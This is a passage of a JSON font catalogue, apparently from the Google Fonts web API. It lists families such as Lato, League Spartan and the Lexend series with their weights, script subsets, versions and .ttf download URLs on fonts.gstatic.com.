\"http://fonts.gstatic.com/s/labelleaurore/v16/RrQIbot8-mNYKnGNDkWlocovHeIIG-eFNVmULg.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lacquer\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/lacquer/v15/EYqzma1QwqpG4_BBB7-AXhttQ5I.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Laila\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/laila/v13/LYjBdG_8nE8jDLzxogNAh14nVcfe.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/laila/v13/LYjMdG_8nE8jDIRdiidIrEIu.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/laila/v13/LYjBdG_8nE8jDLypowNAh14nVcfe.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/laila/v13/LYjBdG_8nE8jDLyFpANAh14nVcfe.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/laila/v13/LYjBdG_8nE8jDLzhpQNAh14nVcfe.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lakki Reddy\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"telugu\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/lakkireddy/v19/S6u5w49MUSzD9jlCPmvLZQfox9k97-xZ.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lalezar\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/lalezar/v14/zrfl0HLVx-HwTP82UaDyIiL0RCg.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lancelot\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/lancelot/v22/J7acnppxBGtQEulG4JY4xJ9CGyAa.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Langar\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"gurmukhi\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v26\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/langar/v26/kJEyBukW7AIlgjGVrTVZ99sqrQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lateef\",\n      \"variants\": [\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v27\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"200\": \"http://fonts.gstatic.com/s/lateef/v27/hESz6XVnNCxEvkb0bjygbqTb9nQ-RA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/lateef/v27/hESz6XVnNCxEvkb0Cj-gbqTb9nQ-RA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/lateef/v27/hESw6XVnNCxEvkbMpheEZo_H_w.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/lateef/v27/hESz6XVnNCxEvkb0Uj6gbqTb9nQ-RA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/lateef/v27/hESz6XVnNCxEvkb0fjmgbqTb9nQ-RA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/lateef/v27/hESz6XVnNCxEvkb0GjigbqTb9nQ-RA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/lateef/v27/hESz6XVnNCxEvkb0BjugbqTb9nQ-RA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lato\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v23\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/lato/v23/S6u8w4BMUTPHh30wWyWrFCbw7A.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/lato/v23/S6u-w4BMUTPHjxsIPy-vNiPg7MU0.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh7USew-FGC_p9dw.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/lato/v23/S6u_w4BMUTPHjxsI9w2PHA3s5dwt7w.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHvxk6XweuBCY.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/lato/v23/S6u8w4BMUTPHjxswWyWrFCbw7A.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh6UVew-FGC_p9dw.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/lato/v23/S6u_w4BMUTPHjxsI5wqPHA3s5dwt7w.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh50Xew-FGC_p9dw.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/lato/v23/S6u_w4BMUTPHjxsI3wiPHA3s5dwt7w.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lavishly Yours\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/lavishlyyours/v2/jizDREVIvGwH5OjiZmX9r5z_WxUY0TY7ikbI.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"League Gothic\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v6\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/leaguegothic/v6/qFdR35CBi4tvBz81xy7WG7ep-BQAY7Krj7feObpH_-amidQ6Q9hn.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"League Script\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/leaguescript/v24/CSR54zpSlumSWj9CGVsoBZdeaNNUuOwkC2s.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"League Spartan\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v6\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/leaguespartan/v6/kJEnBuEW6A0lliaV_m88ja5Twtx8BWhtkDVmjZvM_oXpBMdcFguczA.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/leaguespartan/v6/kJEnBuEW6A0lliaV_m88ja5Twtx8BWhtkDVmjZvMfoTpBMdcFguczA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/leaguespartan/v6/kJEnBuEW6A0lliaV_m88ja5Twtx8BWhtkDVmjZvMoITpBMdcFguczA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/leaguespartan/v6/kJEnBuEW6A0lliaV_m88ja5Twtx8BWhtkDVmjZvM_oTpBMdcFguczA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/leaguespartan/v6/kJEnBuEW6A0lliaV_m88ja5Twtx8BWhtkDVmjZvMzITpBMdcFguczA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/leaguespartan/v6/kJEnBuEW6A0lliaV_m88ja5Twtx8BWhtkDVmjZvMIIPpBMdcFguczA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/leaguespartan/v6/kJEnBuEW6A0lliaV_m88ja5Twtx8BWhtkDVmjZvMGYPpBMdcFguczA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/leaguespartan/v6/kJEnBuEW6A0lliaV_m88ja5Twtx8BWhtkDVmjZvMfoPpBMdcFguczA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/leaguespartan/v6/kJEnBuEW6A0lliaV_m88ja5Twtx8BWhtkDVmjZvMV4PpBMdcFguczA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Leckerli One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/leckerlione/v16/V8mCoQH8VCsNttEnxnGQ-1itLZxcBtItFw.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ledger\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ledger/v16/j8_q6-HK1L3if_sxm8DwHTBhHw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lekton\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/lekton/v17/SZc43FDmLaWmWpBeXxfonUPL6Q.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/lekton/v17/SZc63FDmLaWmWpBuXR3sv0bb6StO.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/lekton/v17/SZc73FDmLaWmWpBm4zjMlWjX4DJXgQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lemon\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/lemon/v14/HI_EiYEVKqRMq0jBSZXAQ4-d.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lemonada\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/lemonada/v22/0QI-MXFD9oygTWy_R-FFlwV-bgfR7QJGJOt2mfWc3Z2pTg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/lemonada/v22/0QI-MXFD9oygTWy_R-FFlwV-bgfR7QJGeut2mfWc3Z2pTg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/lemonada/v22/0QI-MXFD9oygTWy_R-FFlwV-bgfR7QJGSOt2mfWc3Z2pTg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/lemonada/v22/0QI-MXFD9oygTWy_R-FFlwV-bgfR7QJGpOx2mfWc3Z2pTg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/lemonada/v22/0QI-MXFD9oygTWy_R-FFlwV-bgfR7QJGnex2mfWc3Z2pTg.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lexend\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/lexend/v17/wlptgwvFAVdoq2_F94zlCfv0bz1WCzsX_LBte6KuGEo.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/lexend/v17/wlptgwvFAVdoq2_F94zlCfv0bz1WC7sW_LBte6KuGEo.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/lexend/v17/wlptgwvFAVdoq2_F94zlCfv0bz1WC2UW_LBte6KuGEo.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/lexend/v17/wlptgwvFAVdoq2_F94zlCfv0bz1WCzsW_LBte6KuGEo.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/lexend/v17/wlptgwvFAVdoq2_F94zlCfv0bz1WCwkW_LBte6KuGEo.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/lexend/v17/wlptgwvFAVdoq2_F94zlCfv0bz1WC-UR_LBte6KuGEo.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/lexend/v17/wlptgwvFAVdoq2_F94zlCfv0bz1WC9wR_LBte6KuGEo.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/lexend/v17/wlptgwvFAVdoq2_F94zlCfv0bz1WC7sR_LBte6KuGEo.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/lexend/v17/wlptgwvFAVdoq2_F94zlCfv0bz1WC5IR_LBte6KuGEo.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lexend Deca\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/lexenddeca/v17/K2FifZFYk-dHSE0UPPuwQ7CrD94i-NCKm-U48MxArBPCqLNflg.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/lexenddeca/v17/K2FifZFYk-dHSE0UPPuwQ7CrD94i-NCKm-U4cM1ArBPCqLNflg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/lexenddeca/v17/K2FifZFYk-dHSE0UPPuwQ7CrD94i-NCKm-U4rs1ArBPCqLNflg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/lexenddeca/v17/K2FifZFYk-dHSE0UPPuwQ7CrD94i-NCKm-U48M1ArBPCqLNflg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/lexenddeca/v17/K2FifZFYk-dHSE0UPPuwQ7CrD94i-NCKm-U4ws1ArBPCqLNflg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/lexenddeca/v17/K2FifZFYk-dHSE0UPPuwQ7CrD94i-NCKm-U4LspArBPCqLNflg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/lexenddeca/v17/K2FifZFYk-dHSE0UPPuwQ7CrD94i-NCKm-U4F8pArBPCqLNflg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/lexenddeca/v17/K2FifZFYk-dHSE0UPPuwQ7CrD94i-NCKm-U4cMpArBPCqLNflg.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/lexenddeca/v17/K2FifZFYk-dHSE0UPPuwQ7CrD94i-NCKm-U4WcpArBPCqLNflg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lexend Exa\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/lexendexa/v24/UMBCrPdOoHOnxExyjdBeQCH18mulUxBvI9r7T6bHHJ8BRq0b.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/lexendexa/v24/UMBCrPdOoHOnxExyjdBeQCH18mulUxBvI9p7TqbHHJ8BRq0b.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/lexendexa/v24/UMBCrPdOoHOnxExyjdBeQCH18mulUxBvI9qlTqbHHJ8BRq0b.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/lexendexa/v24/UMBCrPdOoHOnxExyjdBeQCH18mulUxBvI9r7TqbHHJ8BRq0b.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/lexendexa/v24/UMBCrPdOoHOnxExyjdBeQCH18mulUxBvI9rJTqbHHJ8BRq0b.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/lexendexa/v24/UMBCrPdOoHOnxExyjdBeQCH18mulUxBvI9olSabHHJ8BRq0b.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/lexendexa/v24/UMBCrPdOoHOnxExyjdBeQCH18mulUxBvI9ocSabHHJ8BRq0b.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/lexendexa/v24/UMBCrPdOoHOnxExyjdBeQCH18mulUxBvI9p7SabHHJ8BRq0b.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/lexendexa/v24/UMBCrPdOoHOnxExyjdBeQCH18mulUxBvI9pSSabHHJ8BRq0b.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lexend Giga\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/lexendgiga/v24/PlIuFl67Mah5Y8yMHE7lkUZPlTBo4MWFfNRC2LmE68oo6eepYQ.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/lexendgiga/v24/PlIuFl67Mah5Y8yMHE7lkUZPlTBo4MWFfNRCWLiE68oo6eepYQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/lexendgiga/v24/PlIuFl67Mah5Y8yMHE7lkUZPlTBo4MWFfNRChriE68oo6eepYQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/lexendgiga/v24/PlIuFl67Mah5Y8yMHE7lkUZPlTBo4MWFfNRC2LiE68oo6eepYQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/lexendgiga/v24/PlIuFl67Mah5Y8yMHE7lkUZPlTBo4MWFfNRC6riE68oo6eepYQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/lexendgiga/v24/PlIuFl67Mah5Y8yMHE7lkUZPlTBo4MWFfNRCBr-E68oo6eepYQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/lexendgiga/v24/PlIuFl67Mah5Y8yMHE7lkUZPlTBo4MWFfNRCP7-E68oo6eepYQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/lexendgiga/v24/PlIuFl67Mah5Y8yMHE7lkUZPlTBo4MWFfNRCWL-E68oo6eepYQ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/lexendgiga/v24/PlIuFl67Mah5Y8yMHE7lkUZPlTBo4MWFfNRCcb-E68oo6eepYQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lexend Mega\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/lexendmega/v24/qFdX35aBi5JtHD41zSTFEuTByuvYFuE9IbDL8fivveyiq9EqQw.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/lexendmega/v24/qFdX35aBi5JtHD41zSTFEuTByuvYFuE9IbDLcfmvveyiq9EqQw.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/lexendmega/v24/qFdX35aBi5JtHD41zSTFEuTByuvYFuE9IbDLr_mvveyiq9EqQw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/lexendmega/v24/qFdX35aBi5JtHD41zSTFEuTByuvYFuE9IbDL8fmvveyiq9EqQw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/lexendmega/v24/qFdX35aBi5JtHD41zSTFEuTByuvYFuE9IbDLw_mvveyiq9EqQw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/lexendmega/v24/qFdX35aBi5JtHD41zSTFEuTByuvYFuE9IbDLL_6vveyiq9EqQw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/lexendmega/v24/qFdX35aBi5JtHD41zSTFEuTByuvYFuE9IbDLFv6vveyiq9EqQw.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/lexendmega/v24/qFdX35aBi5JtHD41zSTFEuTByuvYFuE9IbDLcf6vveyiq9EqQw.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/lexendmega/v24/qFdX35aBi5JtHD41zSTFEuTByuvYFuE9IbDLWP6vveyiq9EqQw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lexend Peta\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/lexendpeta/v24/BXR4vFPGjeLPh0kCfI4OkFX-UTQHSCaxvBgR6SFyW1YuRTsnfw.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/lexendpeta/v24/BXR4vFPGjeLPh0kCfI4OkFX-UTQHSCaxvBgRaSByW1YuRTsnfw.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/lexendpeta/v24/BXR4vFPGjeLPh0kCfI4OkFX-UTQHSCaxvBgRtyByW1YuRTsnfw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/lexendpeta/v24/BXR4vFPGjeLPh0kCfI4OkFX-UTQHSCaxvBgR6SByW1YuRTsnfw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/lexendpeta/v24/BXR4vFPGjeLPh0kCfI4OkFX-UTQHSCaxvBgR2yByW1YuRTsnfw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/lexendpeta/v24/BXR4vFPGjeLPh0kCfI4OkFX-UTQHSCaxvBgRNydyW1YuRTsnfw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/lexendpeta/v24/BXR4vFPGjeLPh0kCfI4OkFX-UTQHSCaxvBgRDidyW1YuRTsnfw.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/lexendpeta/v24/BXR4vFPGjeLPh0kCfI4OkFX-UTQHSCaxvBgRaSdyW1YuRTsnfw.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/lexendpeta/v24/BXR4vFPGjeLPh0kCfI4OkFX-UTQHSCaxvBgRQCdyW1YuRTsnfw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lexend Tera\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/lexendtera/v24/RrQDbo98_jt_IXnBPwCWtYJLZ3P4hnaGKFiM5zITdpz0fYxcrQ.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/lexendtera/v24/RrQDbo98_jt_IXnBPwCWtYJLZ3P4hnaGKFiMZzMTdpz0fYxcrQ.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/lexendtera/v24/RrQDbo98_jt_IXnBPwCWtYJLZ3P4hnaGKFiMuTMTdpz0fYxcrQ.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/lexendtera/v24/RrQDbo98_jt_IXnBPwCWtYJLZ3P4hnaGKFiM5zMTdpz0fYxcrQ.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/lexendtera/v24/RrQDbo98_jt_IXnBPwCWtYJLZ3P4hnaGKFiM1TMTdpz0fYxcrQ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/lexendtera/v24/RrQDbo98_jt_IXnBPwCWtYJLZ3P4hnaGKFiMOTQTdpz0fYxcrQ.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/lexendtera/v24/RrQDbo98_jt_IXnBPwCWtYJLZ3P4hnaGKFiMADQTdpz0fYxcrQ.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/lexendtera/v24/RrQDbo98_jt_IXnBPwCWtYJLZ3P4hnaGKFiMZzQTdpz0fYxcrQ.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/lexendtera/v24/RrQDbo98_jt_IXnBPwCWtYJLZ3P4hnaGKFiMTjQTdpz0fYxcrQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Lexend Zetta\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/lexendzetta/v24/ll8uK2KYXje7CdOFnEWcU8synQbuVYjYB3BCy9bH0z5jbs8qbts.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/lexendzetta/v24/ll8uK2KYXje7CdOFnEWcU8synQbuVYjYB3BCy1bG0z5jbs8qbts.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/lexendzetta/v24/ll8uK2KYXje7CdOFnEWcU8synQbuVYjYB3BCy4jG0z5jbs8qbts.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/lexendzetta/v24/ll8uK2KYXje7CdOFnEWcU8synQbuVYjYB3BCy9bG0z5jbs8qbts.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/lexendzetta/v24/ll8uK2KYXje7CdOFnEWcU8synQbuVYjYB3BCy-TG0z5jbs8qbts.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/lexendzetta/v24/ll8uK2KYXje7CdOFnEWcU8synQbuVYjYB3BCywjB0z5jbs8qbts.ttf\",\n        \"700\": 